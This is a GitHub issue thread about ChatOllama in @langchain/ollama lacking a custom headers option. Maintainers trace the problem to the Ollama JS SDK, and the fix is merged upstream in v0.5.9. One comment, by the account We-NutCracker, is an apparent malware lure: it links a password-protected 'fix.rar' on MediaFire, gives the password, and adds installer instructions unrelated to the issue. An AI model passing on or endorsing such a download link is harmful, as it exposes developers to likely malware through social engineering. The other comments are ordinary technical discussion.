### ISSUE TITLE
Unable to use headers in chat ollama

### ISSUE THREAD

**Issue by ronneldavis** [langchain-ai/langchainjs#6631]
### Checked other resources

- [X] I added a very descriptive title to this issue.
- [X] I searched the LangChain.js documentation with the integrated search.
- [X] I used the GitHub search to find a similar question and didn't find it.
- [X] I am sure that this is a bug in LangChain.js rather than my code.
- [X] The bug is not resolved by updating to the latest stable version of LangChain (or the specific integration package).

### Example Code

```typescript
import { ChatOllama } from "@langchain/ollama";
let model = new ChatOllama({
      baseUrl: "some-url",
      model: model,
      temperature: 0.1,
      numCtx: 16384,
      keepAlive: "60m",
      headers: {

      }
});
```

### Description

I am trying to set headers in chat ollama, I see that it had been fixed for the community library but since splitting out chat ollama, I don't see the option to set custom headers anymore.

### Relevant links:
- https://github.com/langchain-ai/langchainjs/pull/4465
- https://github.com/langchain-ai/langchainjs/pull/4466

### System Info

```json
"langchain": "^0.2.11",
"@langchain/anthropic": "^0.2.13",
"@langchain/core": "0.2.22",
"@langchain/google-genai": "^0.0.25",
"@langchain/google-vertexai": "^0.0.21",
"@langchain/groq": "^0.0.16",
"@langchain/langgraph": "^0.0.33",
"@langchain/ollama": "^0.0.4",
"@langchain/openai": "^0.2.6"
```

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by bracesproul** [comment]
It appears the Ollama SDK doesn't have support for passing headers through to the requests. I've sent a message to the Ollama team asking about the best way to go about this, and will update you when I hear back.

**Comment by ronneldavis** [comment]
Thanks @bracesproul! Looking forward to hearing back from you 👍🏼

**Comment by ronneldavis** [comment]
@bracesproul I have been able to create a PR for ollama js that adds optional headers: https://github.com/ollama/ollama-js/pull/138

**Comment by sdorra** [comment]
@bracesproul the pr is now merged and the version [v0.5.9](https://github.com/ollama/ollama-js/releases/tag/v0.5.9) includes the change.
